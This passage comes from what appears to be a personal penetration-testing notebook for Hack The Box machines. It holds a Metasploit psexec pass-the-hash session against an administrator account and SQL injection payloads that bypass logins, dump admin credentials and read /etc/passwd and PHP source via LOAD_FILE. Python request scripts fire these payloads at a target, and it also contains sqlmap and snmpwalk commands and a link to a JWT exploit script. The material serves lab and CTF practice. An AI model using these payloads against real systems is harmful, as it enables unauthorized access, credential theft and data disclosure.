   SERVICE_DESCRIPTION                    no        Service description to to be used on target for pretty listing
   SERVICE_DISPLAY_NAME                   no        The service display name
   SERVICE_NAME                           no        The service name
   SHARE                 ADMIN$           yes       The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
   SMBDomain             .                no        The Windows domain to use for authentication
   SMBPass                                no        The password for the specified username
   SMBUser                                no        The username to authenticate as


Exploit target:

   Id  Name
   --  ----
   0   Automatic
````

msf5 exploit(windows/smb/psexec) > set smbuser administrator
smbuser => administrator
msf5 exploit(windows/smb/psexec) > set smbpass aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00
smbpass => aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00
msf5 exploit(windows/smb/psexec) > exploit


<a id="sqlinject"></a>
## SQL Injection

[Back to Index](#index)

References: https://sqlwiki.netspi.com/attackQueries/readingAndWritingFiles/#mysql

https://perspectiverisk.com/mysql-sql-injection-practical-cheat-sheet/

#### SQL Injection with POST Variables
````
' or 1=1;--
# Work on the below, does not work
' or (SELECT (SELECT IF((SELECT @@version LIKE '%Maria%'),'1','0')))=1;-- # Check if a MariaSQL Server
' or (SELECT (SELECT IF((SELECT @@version LIKE '%MySQL%'),'1','0')))=1;-- # Check if it is a MySQL Server

SQLite
# The SELECT statement pulls the structure of the SQLLite database
zoo' AND 1=0 UNION SELECT 1,(SELECT group_concat(sql) FROM sqlite_master),3;--
````

In [ ]:
import requests

#sqlinject = ["' or 1=1;--"]
sqlinject = ["' or (SELECT (SELECT IF((SELECT @@version LIKE '%MySQL%'),'1','0')))=1;--"]

remoteurl = "http://" + destIP + "/dev/login.php"
for i in sqlinject:
    print("Injection: " + i)
    postObj = {'name': 'admin', 'pass': i}
    results = requests.post(remoteurl, data = postObj)
    print("HTTP Code: " + str(results.status_code) + "\n")
    print(results.text)
    print("-------------------------------\n\n")

#### SQL Injection with GET Variables

In [ ]:
## Needs some work does not work for cache

import requests

#sqlinject = ["1"]
#sqlinject = ["1 AND EXTRACTVALUE(0, CONCAT(0x5c, VERSION()))"]
# On cache it goes through the first query with the below and then stops
sqlinject = "1 UNION SELECT 1,2,3"
# Find the version of a database
sqlinject = "1 UNION SELECT 1,2,@@version"
# Find the database names that are in a database
sqlinject = "1 UNION SELECT 1,2, concat(schema_name) FROM information_schema.schemata"
# Find the table names in a database
sqlinject = "1 UNION SELECT 1,2, concat(TABLE_NAME) FROM information_schema.TABLES WHERE table_schema='freelancer'"
# Find the column names in a database
sqlinject = "1 UNION SELECT 1,2, concat(column_name) FROM information_schema.COLUMNS WHERE TABLE_NAME='safeadmin'"
sqlinject = "1 UNION SELECT id, username, password FROM freelancer.safeadmin"
sqlinject = "1 UNION SELECT 1,2,LOAD_FILE('/etc/passwd')"
# Tried the dumpfile also into outfile
#sqlinject = "1 UNION SELECT 1,2,3 INTO dumpfile '/var/www/html/mail/1.txt'"
# To keep the php from rendering inside of a php file you can HEX the file
# then use like cyberchef to unhex
sqlinject = "1 UNION SELECT 1,2,HEX(LOAD_FILE('/var/www/html/index.php'))"

remoteurl = "http://" + destIP + "/portfolio.php?id=" + sqlinject

print("Injection: " + remoteurl)
# HTB: cache you need to include the cookies recieved after trying to register in the patient portal
#cookies = {'PHPSESSID':'6o71858gr3oeh8r277oco0um2h', 'OpenEMR':'9bfsi32c0mlj5fa1k2rqkha4vf'}
#results = requests.get(remoteurl, params=getObj, allow_redirects=False, cookies=cookies)
results = requests.get(remoteurl)
print("HTTP Code: " + str(results.status_code) + "\n")
print("-----------------------------------\n\n")
print(results.text)
print("-------------------------------\n\n")

<a id="sqlmap"></a>
## sqlmap

[Back to Index](#index)

Reference: https://chr0x6eos.github.io/2020/10/10/htb-Cache.html


````
sqlmap -r --request copied from zap or burp--
````



<a id="snmpwalk"></a>
## snmpwalk

[Back to Index](#index)

````
In the SNMP here is an IPv6 address represented in decimal form:
iso.3.6.1.2.1.4.34.1.3.2.16.222.173.190.239.0.0.0.0.2.80.86.255.254.185.69.43 = INTEGER: 2

# Could use CyberChef to convert Recipe: from decimal to hex with changing the period to a colon
IPv6: 222.173.190.239.0.0.0.0.2.80.86.255.254.185.69.43
After Converted to Hex: de:ad:be:ef:00:00:00:00:02:50:56:ff:fe:b9:45:2b
Change to IPv6 Format: dead:beef:0000:0000:0250:56ff:feb9:452b
````

In [ ]:
outputLocationSNMP = boxDir + "/snmp.txt"
!snmpwalk -v2c -c public $destIP > $outputLocationSNMP
!cat $outputLocationSNMP

<a id="jwttoken"></a>
## JWT Token Manipulation

[Back to Index](#index)

Reference: https://www.tariqhawis.com/ctf/htb-under-construction-web-challange/

Created Script: https://github.com/thepcn3rd/jwtToken-CVE-2016-10555